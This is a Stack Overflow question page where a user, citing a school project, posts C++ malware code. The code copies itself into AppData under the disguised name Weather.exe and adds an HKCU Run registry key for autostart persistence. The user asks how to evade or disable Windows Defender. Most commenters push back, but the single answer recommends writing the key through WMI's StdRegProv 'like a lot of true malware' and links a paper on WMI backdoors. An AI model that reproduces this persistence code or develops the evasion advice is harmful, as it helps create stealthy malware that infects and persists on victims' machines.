0

For a school project, I'm developing a tiny malware that replicate itself and autorun with reg keys.

I want my program to set a reg key to autorun but when I do it Windows defender detect the RegSetValueExA function from windows.h. I also want my program to execute without administrator privilege.

My teacher told me that it's possible to avoid the detection. I have to detect when WD look at my program and tell it to stop/sleep while WD perform the scan. He also told me that it's possible to disable WD with powershell. But I don't really know how to it.

Here's the code that triggers Windows Defender:

void Victim::replicateNpersist()
{
  char filename[ MAX_PATH ];

  // Declaration of the directory that contain the malware
  string Dir = "C:\\Users\\"+string(c_user)+"\\AppData\\Local\\WeatherChannel";
  int LDir = Dir.length();
  char dirPath[LDir+1];
  strcpy(dirPath, Dir.c_str());

  // Declaration of the object to copy
  string Dest = "C:\\Users\\"+c_user+"\\AppData\\Local\\WeatherChannel\\Weather.exe";
  int LDest = Dest.length();
  char newLocation[LDest+1];
  strcpy(newLocation,Dest.c_str());

  // Creation of directory
  CreateDirectoryA(dirPath, NULL);
  BOOL stats=0;
  DWORD size = GetModuleFileNameA(NULL, filename, MAX_PATH);
  CopyFileA(filename, newLocation, stats);

  // Persistence
  HKEY hKey;
  LPCSTR keyPath = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
  LONG lnRes = RegOpenKeyExA(HKEY_CURRENT_USER, keyPath,0,KEY_WRITE,&hKey);
  if(lnRes == ERROR_SUCCESS) {
  RegSetValueExA(hKey,"Weather.exe", 0, REG_SZ,(LPBYTE)newLocation,strlen(newLocation)+1);    
 }
}
Peter Cordes
  • 328,167
  • 45
  • 605
  • 847
Sad1que
  • 37
  • 6
  • 8
    What would be the point of Windows Defender if malware could just ask it to not work? – Sneftel Apr 30 '21 at 13:29
  • I asked myself the same question, but my teacher who is a reverser at McAfee told me that it was possible. I also found some article about AV patching. The point is to hide suspisious API call of windows.h – Sad1que Apr 30 '21 at 13:33
  • What does [assembly] language have to do with this? Are you writing something in assembly? Or are you just concerned about the machine-code created by the compiler being recognizable to Windows Defender? Anyway, not really clear why you tagged it, might be good to elaborate. – Peter Cordes Apr 30 '21 at 13:34
  • We can implement assembly in C++ programs. I saw that some AV patching method used asm to catch AV scan : http://www.rohitab.com/discuss/topic/39662-patching-avs/?pid=10089791#entry10089791. Maybe it's not possible to avoid AV detection with C++ only. That's why I putted asm in tags – Sad1que Apr 30 '21 at 13:38
  • WD isn't like a security guard patrolling a building, where you can sneak in as long as it's looking somewhere else at that moment. If you call RegSetValue, it'll notice, because it's notified when a program calls RegSetValue. – Sneftel Apr 30 '21 at 14:03
  • _"but my teacher who is a reverser at McAfee told me that it was possible"_. Sounds like your teacher is the person you should ask this question then. – Michael Apr 30 '21 at 14:05
  • Even if disabling/working around WD is possible, you are quite unlikely to find the information on how to do this readily available online. If your teacher knows a way, it would be a subject to published 0-day vulnerability, which is best to be shared with the community. – SergeyA Apr 30 '21 at 14:10
  • I see, so the so the patching solution isn't working anymore ? Is there another way to make a malicious program persistent ? Because if it was not the case, there would be no more viruses at present. So I wonder how malware persist currently – Sad1que Apr 30 '21 at 14:13

1 Answers1

0

Try to create your registry key in another manner. Like a lot of true malware, you can try to use StdRegProv class through WMI : Getting value from an OUT parameter in WMI in C++

https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf

Tony
  • 11
  • 2